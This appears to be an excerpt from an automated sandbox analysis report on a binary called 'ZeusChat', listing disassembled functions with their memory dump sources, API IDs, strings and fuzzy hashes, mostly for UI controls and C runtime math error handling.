                                                                                                      • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                      • Instruction Fuzzy Hash: 394108325096C286D670AF21E8407AFF7A1FB84790F944235DBAD03A99EF7CD486CB50
                                                                                                      Function 00007FF7520ABA9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                                                      • String ID: $SysTabControl32
                                                                                                      • API String ID: 2080134422-3143400907
                                                                                                      • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                      • Instruction ID: 0c0d85046961db2d942585a4c51143f1fb687fd1dbbd3b0c0e657f8e7b7472db
                                                                                                      • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                      • Instruction Fuzzy Hash: 0B317A3251A7C1CAE770DF11A80479AB7A0F7847A0F544335EAA817AD8CB7CD445CF10
                                                                                                      Function 00007FF75203DAC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3000768030-2766056989
                                                                                                      • Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                      • Instruction ID: f0ce4658c3050796edef6c18bee7b62ddeed351665db332eacb41bfa7c59db67
                                                                                                      • Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                                                                                                      • Instruction Fuzzy Hash: 1421D722E0DB8AC1EB609B249D90179A661EB55774FAC0335D6AE077D4CF7CD887D310
                                                                                                      Function 00007FF7520AA938 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                      • Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                      • Instruction ID: f543b47160e152046fbbe1f16780d7406a11bf84caf299e6aeb7e23539be5fee
                                                                                                      • Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                                                                                                      • Instruction Fuzzy Hash: 47314B32A09781CBE364DF29E44075AB7A5F788790F544239EB9D43B98CB78E855CF10
                                                                                                      Function 00007FF7520AA0DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: Combobox
                                                                                                      • API String ID: 1025951953-2096851135
                                                                                                      • Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                      • Instruction ID: f4455cab4e1c4f797aa4c818c00aafc460d241f4b5461390d1312088c86f79f1
                                                                                                      • Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                                                                                                      • Instruction Fuzzy Hash: FA312A326097C18AE7709F25A840B5AB7A1F7897A0F944235EAAD03B99CB7DD845CF10
                                                                                                      Function 00007FF7520AA448 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                      • Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                      • Instruction ID: 66224a24802206f6584e00e3abdd6b93df776d802927c348ebbf978da2184e15
                                                                                                      • Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                                                                                                      • Instruction Fuzzy Hash: 5F313636A09BC18AE770DB15E84475AB7A1F7887A0F944235EAAC43B98CB7CD845CF10
                                                                                                      Function 00007FF75203FC20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: "$pow
                                                                                                      • API String ID: 1757819995-713443511
                                                                                                      • Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                      • Instruction ID: 76d247ee4e3fc12ea04853479b5a9515512c7ec7bdbade5fb6affbd6036eb8ac
                                                                                                      • Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                                                                                                      • Instruction Fuzzy Hash: BC215E72D1CA8887D370DF10E94866AEAA1FBEA344F641326F78906A54CBBDD049DB10
                                                                                                      Function 00007FF7520B0624 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3712363035-3916222277
                                                                                                      • Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                                                                                                      • Instruction ID: 6676dace38cb51db5fbe4aaf69b6adea10f801eab790490974cea6670c3d74bb
                                                                                                      • Opcode Fuzzy Hash: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                                                                                                      • Instruction Fuzzy Hash: 4B118231A0978186E714AF12FC4065AF7A5FF84790F8C4136EA4D47A64CFBDD499CB10
                                                                                                      Function 00007FF752041444 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$tan
                                                                                                      • API String ID: 3384550415-2428968949
                                                                                                      • Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                      • Instruction ID: 5022e03c795ea1cbbccee9b51fb513c76be5796b5c8daebfe741abd285c59a6f
                                                                                                      • Opcode Fuzzy Hash: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                                                                                                      • Instruction Fuzzy Hash: F5019671E19B8942DA14DF12A84033AE1A1BFDA7D4F945334E99D17B94EF7CD144CB40
                                                                                                      Function 00007FF75204138C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$sin
                                                                                                      • API String ID: 3384550415-1565623160
                                                                                                      • Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                      • Instruction ID: 20944e5a1bd4d27dd268f17fc8d4caf043db3e033bacdbbccd0d2503c42ccef7
                                                                                                      • Opcode Fuzzy Hash: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                                                                                                      • Instruction Fuzzy Hash: 0D01D872E19B8942DA14DF12984037AE161BFDA7D4FD08334E95D16B94EFBCD045CB00
                                                                                                      Function 00007FF752041378 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                      • String ID: !$cos
                                                                                                      • API String ID: 3384550415-1949035351
                                                                                                      • Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                      • Instruction ID: f9fdc8b94a6d01df01be31c98116013d1179ac6c608e5e83b7ef9122870d70d3
                                                                                                      • Opcode Fuzzy Hash: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                                                                                                      • Instruction Fuzzy Hash: F101D872E19B8942DA14DF129840376E161BFDA7D4FD08324E95D16BD4EFBCD045CB00
                                                                                                      Function 00007FF752041200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: "$exp
                                                                                                      • API String ID: 1757819995-2878093337
                                                                                                      • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction ID: 9a45cf4205244a6946138a01c0dd77fb819914d496844e78651ac40ed843e23d
                                                                                                      • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction Fuzzy Hash: 4C01C836D29B8883E320DF24D4492AAB771FFEA704F645315E74416664CBBDD485DF00
                                                                                                      Function 00007FF752027450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF752027479
                                                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7520270D1,?,?,?,?,00007FF75202649C,?,?,?,?,00007FF752024B1B), ref: 00007FF752027490
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Valuetry_get_function
                                                                                                      • String ID: FlsSetValue
                                                                                                      • API String ID: 738293619-3750699315
                                                                                                      • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction ID: 18f7a9067f2e35ad84cd9438c36aff5bc465b88d6fd2cac5c25d1a78fe784fb7
                                                                                                      • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction Fuzzy Hash: 46E06565E0A546C2EA246B51FD405BEA261AF48790FCC4032D61D063A5CEBCEC9CC670
                                                                                                      Function 00007FF752025468 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF752025471
                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF752025482
                                                                                                        • Part of subcall function 00007FF752026EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF752025487), ref: 00007FF752026F1D
                                                                                                        • Part of subcall function 00007FF752026EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF752025487), ref: 00007FF752026F4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3561508498-410509341
                                                                                                      • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction ID: 619156153bfbc1fc13607597de0dc92c18fce4cf1b9bd5d80f0bb3ef1689685f
                                                                                                      • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction Fuzzy Hash: 1FD05E22A1AA8A91DF10FB00DCD03A9E330FB80308FD84432D14C815B1DFADDA4EC710